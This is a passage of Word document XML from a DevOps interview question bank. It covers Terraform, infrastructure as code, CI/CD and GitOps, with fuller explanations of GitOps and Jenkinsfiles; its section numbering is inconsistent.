      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q406. Scenario - poisoned base image: A base image your Dockerfiles depend on was found to contain a vulnerable package after being in production for weeks. How do you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Terraform &amp; IaC (361–450)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q407. Explain Infrastructure as Code.</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Q408. What are Terraform providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform providers are plugins that allow Terraform to interact with APIs such as GCP, AWS, Azure, Kubernetes, and GitHub. Providers define available resources and data sources.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Providers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Q409. What is terraform init?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform init initializes a Terraform working directory. It downloads providers, configures the backend, and prepares modules before plan or apply.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Init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Q410. Explain terraform plan.</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Q411. What is terraform apply?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform apply executes the planned infrastructure changes. In production it should be gated by review, policy checks, state locking, and rollback planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Apply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Q412. Explain terraform destroy.</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Q413. Explain reusable modules.</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Q414. What is remote state?</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Q415. Explain state locking.</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Q416. What is backend configuration?</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Q417. Explain Terraform workspaces.</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Q418. What is interpolation?</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Q419. Explain variables in Terraform.</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Q420. What are outputs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform outputs expose useful values from a module or root configuration, such as IDs, endpoints, or connection details. They can be consumed by users, automation, or other modules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Outputs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Q421. Explain locals.</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Q422. What is terraform import?</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Q423. Explain taint in Terraform.</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Q424. What is drift detection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift detection compares real infrastructure with Terraform state and configuration. It identifies manual or external changes that may require remediation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Drift Detection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Q425. Explain lifecycle rules.</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Q426. What is depends_on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: depends_on explicitly defines a dependency when Terraform cannot infer it from references. It ensures resources are created, updated, or destroyed in the correct order.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Depends_on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Q427. Explain count vs for_each.</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Q428. What is dynamic block?</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Q429. Explain Terraform graph.</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Q430. What is state corruption?</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Q431. Explain Terraform Cloud.</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Q432. What is Terraform Enterprise?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform Enterprise is the self-hosted enterprise version of Terraform Cloud. It provides governance, private execution, auditability, and collaboration features for regulated organizations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Enterprise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Q433. Explain policy as code in Terraform.</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Q434. What is Sentinel?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Q435. Explain OpenTofu.</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Q436. What is Terragrunt?</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Q437. Explain Terraform testing.</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Q438. What is infrastructure modularization?</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Q439. Explain Terraform security.</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Q440. What is secret handling in Terraform?</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Q441. Explain provider authentication.</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Q442. What is Terraform workspace isolation?</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Q443. Explain environment management.</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Q444. What are Terraform anti-patterns?</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Q445. Explain state file security.</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Q446. What is state migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: State migration moves Terraform state between backends or reorganizes resources across states. It requires backups, locking, careful state mv/import operations, and validation plans.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>State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Q447. Explain provider versioning.</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Q448. What is Terraform locking issue?</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Q449. Explain partial applies.</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Q450. What is Terraform refresh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform refresh updates state with real infrastructure values. Modern Terraform includes refresh during plan by default, while refresh-only plans can inspect drift without changing resources.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Refresh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Q451. Explain drift remediation.</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Q452. What is immutable infrastructure?</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Q453. Explain Terraform with GCP.</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Q454. What is Terraform with AWS?</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Q455. Explain Terraform with Azure.</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Q456. What is Terraform registry?</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Q457. Explain module publishing.</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Q458. What is infrastructure testing?</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Q459. Explain Kitchen Terraform.</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Q460. What is tfsec?</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Q461. Explain Checkov.</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Q462. What is IaC scanning?</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Q463. Explain policy enforcement.</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Q464. What is bootstrap infrastructure?</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Q465. Explain multi-account IaC.</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Q466. What is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Q467. Explain Terraform pipelines.</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Q468. What is GitOps with Terraform?</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Q469. Explain Atlantis.</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Q470. What is Spacelift?</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Q471. Explain Terraform performance optimization.</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Q472. What is drift in cloud resources?</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Q473. Explain cost optimization with Terraform.</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Q474. What is tagging strategy?</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Q475. Explain Terraform debugging.</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Q476. What is HCL?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Q477. Explain resource graph dependencies.</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Q478. What is data source?</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Q479. Explain Terraform provisioners.</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Q480. What are null resources?</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Q481. Explain local-exec.</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Q482. What is remote-exec?</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Q483. Explain bootstrap scripts.</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Q484. What is Terraform state encryption?</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Q485. Explain backend migration.</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Q486. What are Terraform workspaces use cases?</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Q487. Explain state sharing issues.</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Q488. What is IaC governance?</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Q489. Explain infrastructure compliance.</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Q490. What are common Terraform failures?</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Q491. Explain Terraform recovery strategies.</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Q492. What is declarative infrastructure?</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Q493. Design enterprise-grade Terraform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2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>CI/CD &amp; GitOps (261–360)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q494. Explain CI pipeline.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q495. What is CD?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q496. Explain continuous deployment.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q497. What is continuous delivery?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q498. Explain GitOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is GitOps?</w:t>
        <w:br/>
        <w:t>GitOps is an operational framework that uses Git as the single source of truth for both application deployments and infrastructure management.</w:t>
        <w:br/>
        <w:t>Instead of manually deploying changes to Kubernetes or cloud environments, you make changes in Git, and a GitOps tool automatically synchronizes those changes to the target environment.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core Idea</w:t>
        <w:br/>
        <w:t>“If it’s running in production, it should be defined in Git.”</w:t>
        <w:br/>
        <w:t>Git stores:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes manifests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Helm charts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Terraform code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Infrastructure definitions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GitOps Workflow</w:t>
        <w:br/>
        <w:t>Developer Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Git Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Pull Request Review</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Merge to Main Branch</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>GitOps Tool Detects Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Sync to Kubernetes Cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Application Updated</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose your application is running with 3 replicas:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>You want to scale it to 5 replicas.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Update the YAML file in Git:</w:t>
        <w:br/>
        <w:t>replicas: 5</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Create a Pull Request.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. After approval, merge it.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. GitOps tool detects the change.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Kubernetes cluster is automatically updated to 5 replicas.</w:t>
        <w:br/>
        <w:t>No manual kubectl apply is needed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Principles</w:t>
        <w:br/>
        <w:t>1. Git as Source of Truth</w:t>
        <w:br/>
        <w:t>The desired state of infrastructure and applications is stored in Git.</w:t>
        <w:br/>
        <w:t>2. Declarative Configuration</w:t>
        <w:br/>
        <w:t>Infrastructure is described declaratively.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:t>image: app:v1</w:t>
        <w:br/>
        <w:t>3. Automated Reconciliation</w:t>
        <w:br/>
        <w:t>GitOps tools continuously compare:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Desired state (Git)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Actual state (Cluster)</w:t>
        <w:br/>
        <w:t>If drift occurs, they automatically correct it.</w:t>
        <w:br/>
        <w:t>4. Pull-Based Deployments</w:t>
        <w:br/>
        <w:t>The cluster pulls changes from Git rather than external systems pushing changes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>✅ Version control for infrastructure</w:t>
        <w:br/>
        <w:t>✅ Easy rollback</w:t>
        <w:br/>
        <w:t>✅ Audit trail of all changes</w:t>
        <w:br/>
        <w:t>✅ Faster deployments</w:t>
        <w:br/>
        <w:t>✅ Reduced manual errors</w:t>
        <w:br/>
        <w:t>✅ Improved security</w:t>
        <w:br/>
        <w:t>✅ Drift detection and correction</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular GitOps Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flux</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GitOps vs Traditional CI/CD</w:t>
        <w:br/>
        <w:t>Traditional CI/CD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GitOps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pipeline pushes changes to cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster pulls changes from Git</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment state may differ</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Git is always the source of truth</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual kubectl commands possible</w:t>
        <w:br/>
        <w:tab/>
        <w:t>All changes go through Git</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited auditability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complete audit trail</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example (GKE)</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>GitHub Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Pull Request Approval</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Merge to Main</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>ArgoCD Watches Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Syncs Changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>GKE Cluster Updated</w:t>
        <w:br/>
        <w:t>If someone manually changes a deployment in GKE:</w:t>
        <w:br/>
        <w:t>kubectl scale deployment app --replicas=10</w:t>
        <w:br/>
        <w:t>but Git says:</w:t>
        <w:br/>
        <w:t>replicas: 5</w:t>
        <w:br/>
        <w:t>ArgoCD detects the drift and automatically reverts the cluster back to 5 replicas.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1–2 Minutes)</w:t>
        <w:br/>
        <w:t>GitOps is a deployment and operations methodology that uses Git as the single source of truth for infrastructure and application configurations. All changes are made through Git pull requests, reviewed, and merged before being applied. A GitOps tool such as ArgoCD continuously monitors the repository and synchronizes the desired state stored in Git with the actual state of the Kubernetes cluster. This approach provides version control, auditability, automated rollbacks, drift detection, and consistent deployments. In production environments, GitOps helps improve reliability, security, and operational efficiency by eliminating manual deployment steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q499. What are GitOps principles?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q500. Explain Jenkins architecture.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q501. What is Jenkins master-agent?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q502. Explain Jenkins pipelines.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q503. What is Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Jenkinsfile?</w:t>
        <w:br/>
        <w:t>A Jenkinsfile is a text file that contains the definition of a Jenkins Pipeline written in Groovy-based syntax.</w:t>
        <w:br/>
        <w:t>It allows you to define your CI/CD pipeline as code and store it in the same Git repository as your application.</w:t>
        <w:br/>
        <w:t>This concept is called Pipeline as Code.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use a Jenkinsfile?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version controlled with application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy to review through Pull Requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reusable and maintainable</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent pipeline across environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Eliminates manual Jenkins job configuration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Location</w:t>
        <w:br/>
        <w:t>The Jenkinsfile is typically stored in the root directory of the project.</w:t>
        <w:br/>
        <w:t>project/</w:t>
        <w:br/>
        <w:t>├── src/</w:t>
        <w:br/>
        <w:t>├── pom.xml</w:t>
        <w:br/>
        <w:t>├── Dockerfile</w:t>
        <w:br/>
        <w:t>└── Jenkinsfile</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Basic Jenkinsfile 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Real-World Example</w:t>
        <w:br/>
        <w:t>For a Java application:</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>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Main Components of a Jenkinsfile</w:t>
        <w:br/>
        <w:t>1. Agent</w:t>
        <w:br/>
        <w:t>Specifies where the pipeline runs.</w:t>
        <w:br/>
        <w:t>agent any</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>agent {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    label 'docker-agent'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Stages</w:t>
        <w:br/>
        <w:t>Logical phases of the pipeline.</w:t>
        <w:br/>
        <w:t>stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Test') {}</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Steps</w:t>
        <w:br/>
        <w:t>Actual commands executed.</w:t>
        <w:br/>
        <w:t>steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sh 'mvn clean package'</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Environment Variables</w:t>
        <w:br/>
        <w:t>environment {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    APP_NAME = "myapp"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Usage:</w:t>
        <w:br/>
        <w:t>sh "echo ${APP_NAME}"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Post Actions</w:t>
        <w:br/>
        <w:t>Executed after pipeline completion.</w:t>
        <w:br/>
        <w:t>post {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    success {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build Successful'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    failure {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build Failed'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Declarative vs Scripted Jenkinsfile</w:t>
        <w:br/>
        <w:t>Declarative (Recommended)</w:t>
        <w:br/>
        <w:t>pipeline {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    agent any</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stages {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">            steps {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                echo 'Build'</w:t>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Scripted</w:t>
        <w:br/>
        <w:t>node {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    stage('Build') {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        echo 'Build'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Jenkins Uses Jenkinsfile</w:t>
        <w:br/>
        <w:t>Developer Pushes Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>GitHub Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>Jenkins Reads Jenkinsfile</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>Executes Pipeline Stages</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ↓</w:t>
        <w:br/>
        <w:t>Build → Test → Deploy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>A Jenkinsfile is a text file that defines a Jenkins Pipeline using Groovy syntax. It is stored in the application’s source code repository and enables Pipeline as Code. The Jenkinsfile contains stages such as checkout, build, test, security scanning, packaging, and deployment. When a pipeline is triggered, Jenkins reads the Jenkinsfile and executes the defined steps automatically. Using a Jenkinsfile provides version control, consistency, reusability, and easier maintenance of CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q504. Explain scripted pipeline.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q505. What is declarative pipeline?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q506. Explain GitHub Actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitHub Actions is a GitHub-native CI/CD platform that runs workflows from YAML files stored in a repository. It is commonly used to build, test, scan, package, and deploy applications whenever code is pushed, a pull request is opened, or a manual trigger is used.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Github Actions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Q507. What are GitHub runners?</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Q508. Explain reusable workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Reusable workflows allow one GitHub Actions workflow to call another workflow, so common CI/CD logic can be shared across repositories. They reduce duplication, standardize quality gates, and make enterprise pipeline governance easier.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Reusable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Q509. What is GitLab CI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitLab CI is GitLab’s built-in CI/CD system that uses a .gitlab-ci.yml file to define stages, jobs, runners, artifacts, variables, and deployment rules. It is useful when source control, CI/CD, security scanning, and release management are handled inside GitLab.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Gitlab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Q510. What is ArgoCD?</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Q511. Explain Argo Workflows.</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Q512. What is FluxCD?</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Q513. Explain rollback in GitOps.</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Q514. What is image automation?</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Q515. Explain webhook triggers.</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Q516. What are pipeline stages?</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Q517. Explain artifact repositories.</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Q518. What is Nexus?</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Q519. Explain JFrog Artifactory.</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Q520. What is semantic versioning?</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Q521. Explain branching strategies.</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Q522. What is GitFlow?</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Q523. Explain trunk-based development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trunk-based development keeps most work close to a single main branch, with short-lived branches and frequent merges. It supports faster integration, smaller changes, feature flags, and continuous delivery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Trunk-based Development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Q524. What is feature branching?</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Q525. Explain merge conflicts.</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Q526. What are protected branches?</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Q527. Explain code review process.</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Q528. What is static code analysis?</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Q529. Explain SonarQube.</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Q530. What is shift-left testing?</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Q531. Explain unit testing in CI.</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Q532. What is integration testing?</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Q533. Explain smoke testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Smoke testing is a small set of critical checks that confirms a build or deployment is basically functional. It is commonly run immediately after deployment to catch obvious failures quickly.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Smoke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Q534. What is regression testing?</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Q535. Explain pipeline parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline parallelism runs independent CI/CD jobs at the same time, such as test suites, scans, or builds for multiple services. It reduces overall pipeline duration while preserving required dependencies between stages.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pipeline Parallelism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Q536. What is deployment gating?</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Q537. Explain approval workflows.</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Q538. Explain self-hosted runners.</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Q539. What is GitOps reconciliation?</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Q540. Explain drift detection in GitOps.</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Q541. What is sealed secrets?</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Q542. Explain secret injection.</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Q543. What is HashiCorp Vault?</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Q544. Explain secret rotation.</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Q545. What is immutable deployment?</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Q546. Explain canary rollout.</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Q547. Explain progressive delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Progressive delivery releases changes gradually using canaries, feature flags, traffic shifting, and automated analysis. It reduces blast radius and allows data-driven rollout decisions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
